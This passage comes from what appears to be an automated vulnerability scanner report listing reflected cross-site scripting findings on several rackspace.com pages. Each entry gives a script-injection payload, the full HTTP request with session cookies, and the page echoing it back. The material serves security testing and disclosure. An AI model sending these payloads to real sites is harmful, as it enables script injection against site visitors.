GET /managed_hosting/support/customers/index.php?637f5"><script>alert(1)</script>4561d53e9ea=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/customers/index.php?637f5"><script>alert(1)</script>4561d53e9ea=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.173. http://www.rackspace.com/managed_hosting/support/dedicatedteam.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/support/dedicatedteam.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89fc7"><script>alert(1)</script>6af212d1899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/dedicatedteam.php?89fc7"><script>alert(1)</script>6af212d1899=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/dedicatedteam.php?89fc7"><script>alert(1)</script>6af212d1899=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.174. http://www.rackspace.com/managed_hosting/support/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/support/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15524"><script>alert(1)</script>b65bab80c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/index.php?15524"><script>alert(1)</script>b65bab80c3=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... lick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/index.php?15524"><script>alert(1)</script>b65bab80c3=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.175. http://www.rackspace.com/managed_hosting/support/promise.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/support/promise.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb89"><script>alert(1)</script>c2024b40a5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/promise.php?5eb89"><script>alert(1)</script>c2024b40a5b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/promise.php?5eb89"><script>alert(1)</script>c2024b40a5b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.176. http://www.rackspace.com/managed_hosting/support/servicelevels/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/support/servicelevels/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 702b0"><script>alert(1)</script>b9215bfd26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/servicelevels/index.php?702b0"><script>alert(1)</script>b9215bfd26e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... at_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/servicelevels/index.php?702b0"><script>alert(1)</script>b9215bfd26e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.177. http://www.rackspace.com/managed_hosting/websites/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /managed_hosting/websites/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 506cc"><script>alert(1)</script>9f391e95dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/websites/index.php?506cc"><script>alert(1)</script>9f391e95dee=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/websites/index.php?506cc"><script>alert(1)</script>9f391e95dee=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.178. http://www.rackspace.com/openstack/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /openstack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6332"><script>alert(1)</script>5c0ff8b0e84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /openstack/?f6332"><script>alert(1)</script>5c0ff8b0e84=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... utton('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/mediacenter/announcements/openstack.php?f6332"><script>alert(1)</script>5c0ff8b0e84=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.179. http://www.rackspace.com/partners/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /partners/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 295ac"><script>alert(1)</script>efd95d381f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/index.php?295ac"><script>alert(1)</script>efd95d381f4=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... e-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/partners/index.php?295ac"><script>alert(1)</script>efd95d381f4=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.180. http://www.rackspace.com/partners/partnersearch.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /partners/partnersearch.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5d9"><script>alert(1)</script>a767629db4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/partnersearch.php?ce5d9"><script>alert(1)</script>a767629db4e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/partners/partnersearch.php?ce5d9"><script>alert(1)</script>a767629db4e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.181. http://www.rackspace.com/searchresults.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /searchresults.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df81"><script>alert(1)</script>8789091b848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /searchresults.php?4df81"><script>alert(1)</script>8789091b848=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf622"><script>alert(1)</script>9a19425fe4 was submitted in the q parameter. This input was echoed unmodified in the application's response.
